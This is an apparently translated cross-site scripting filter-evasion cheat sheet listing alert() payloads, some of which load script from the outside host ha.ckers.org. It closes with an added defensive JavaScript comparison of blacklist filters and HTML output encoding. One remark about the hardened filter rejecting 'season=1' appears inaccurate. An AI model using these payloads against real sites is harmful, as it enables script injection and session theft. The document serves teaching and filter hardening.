1. Change the case of the characters

<sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a different extension instead of .js

<script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");')
}

5. Insert extra characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use tab or newline characters to evade

<img src="jav ascr ipt:alert('XSS3')">    -> the gaps are tab characters

<IMG SRC="jav ascript:alert('XSS');">    -> the gap is a newline

7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" terminator may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

(The entity-encoded form of each pair was decoded when the post was rendered, so only the source form survives here.)

9. Script in an HTML tag

<body onload="alert('onload')">

Other event handlers that can carry script the same way: onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside an swf

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and have it reassembled

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
</BODY></HTML>

13. Write a cookie through META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript: in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
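Every item in the list above relies on the same gap: a blacklist filter matches the exact bytes it was given, while the browser decodes entities, ignores tab and newline inside a scheme, drops CSS comments and backslash escapes, and compares tag names case-insensitively before it acts on the input. The block below, an added example that is not part of the original post, puts a deliberately weak case-sensitive blacklist (naiveFilterBlocks) next to one that normalises the input first (hardenedFilterBlocks) and next to plain HTML output encoding (escapeHtml), then runs the payloads from items 1, 3, 5, 6, 7 and 9 through all three. The two payloads marked "constructed" stand in for the entity-encoded and CSS hex-escaped forms of item 8, whose encoded text did not survive the post; "t.js" is the placeholder the list itself uses.

```javascript
// Added example, not from the original post. Models why the payload list above
// works: a literal blacklist sees the raw bytes, the browser sees the decoded
// ones. Three pieces:
//   naiveFilterBlocks    - case-sensitive literal blacklist (the weak target)
//   hardenedFilterBlocks - same blacklist after browser-like normalisation
//   escapeHtml           - output encoding for the HTML text/attribute context,
//                          which makes the blacklist unnecessary
// Payloads are copied from the list above except the two marked "constructed".

const NAIVE_PATTERNS = [/<script>/, /javascript:/, /expression\(/];

// Deliberately weak: case-sensitive, literal substrings only.
function naiveFilterBlocks(input) {
  return NAIVE_PATTERNS.some((re) => re.test(input));
}

// Code point helper that refuses values outside the Unicode range.
function cp(digits, radix) {
  const n = parseInt(digits, radix);
  return n > 0x10ffff ? "\uFFFD" : String.fromCodePoint(n);
}

// Normalise roughly the way a browser does before it interprets the token.
function normalise(input) {
  const s = input
    // item 8: numeric character references, with or without the ";" terminator
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(h, 16))
    .replace(/&#(\d+);?/g, (_, d) => cp(d, 10))
    // item 6: tab, newline and carriage return are ignored inside a URL scheme
    .replace(/[\t\n\r]/g, "")
    // item 7: CSS comments can sit in the middle of an identifier
    .replace(/\/\*[\s\S]*?\*\//g, "")
    // item 7: CSS hex escapes such as \65 ("e"), then any remaining "\" escape
    .replace(/\\([0-9a-f]{1,6})\s?/gi, (_, h) => cp(h, 16))
    .replace(/\\/g, "");
  return s.toLowerCase(); // item 1: tag and scheme names are case-insensitive
}

// Same idea as the naive list, but matched against the normalised form and
// without requiring the closing ">" (item 5) or a literal "script" (item 3).
const HARDENED_PATTERNS = [/<script/, /javascript:/, /expression\(/, /\bon\w+\s*=/];

function hardenedFilterBlocks(input) {
  return HARDENED_PATTERNS.some((re) => re.test(normalise(input)));
}

// The durable fix: encode on output for the HTML context. After this none of
// the payloads can open a tag, close an attribute or start a URL.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "`": "&#x60;" };
  return s.replace(/[&<>"'`]/g, (c) => map[c]);
}

const PAYLOADS = [
  "<sCript>alert('d')</scRipT>",                                  // item 1
  '<script src="bad.jpg"></script>',                              // item 3
  '<SCRIPT/SRC="t.js"></SCRIPT>',                                 // item 5
  "<img src=\"jav\tascr\tipt:alert('XSS3')\">",                   // item 6, tabs
  "<IMG SRC=\"jav\nascript:alert('XSS');\">",                     // item 6, newline
  '<IMG STYLE=\'xss:expre\\ssion(alert("XSS33"))\'>',             // item 7
  "<IMG STYLE=\"xss:expr/*anyword*/ession(alert('sss'))\">",      // item 7
  "<DIV STYLE=\"width: expre\\ssi\\on(alert('XSS31'));\">",       // item 7
  // constructed: entity-encoded "javascript" for item 8
  "<IMG SRC=\"&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert('XSS')\">",
  // constructed: CSS hex escape \65 = "e" for item 8
  "<DIV STYLE=\"width: \\65xpression(alert('XSS'))\">",
  "<body onload=\"alert('onload')\">",                            // item 9
];

// Run every payload through the three functions and report what each saw.
function evaluate(payloads = PAYLOADS) {
  return payloads.map((payload) => ({
    payload,
    naiveBlocks: naiveFilterBlocks(payload),
    hardenedBlocks: hardenedFilterBlocks(payload),
    escaped: escapeHtml(payload),
  }));
}

for (const r of evaluate()) {
  console.log(`naive=${r.naiveBlocks} hardened=${r.hardenedBlocks}  ${r.payload}`);
}
```

Run with node; the naive filter misses all eleven payloads and the normalising one catches all of them. The normalising filter is still a blacklist, though: it will also reject harmless text such as "season=1", and it knows nothing about the DATASRC/DATAFLD, HTML+TIME, DYNSRC/LOWSRC and expression() vectors in items 7 to 14, which are Internet Explorer features (javascript: in an img src no longer runs in current browsers either, although it still does in an iframe src). Encoding on output for the context the data lands in, backed by a Content-Security-Policy, is what removes the whole class rather than one spelling of it.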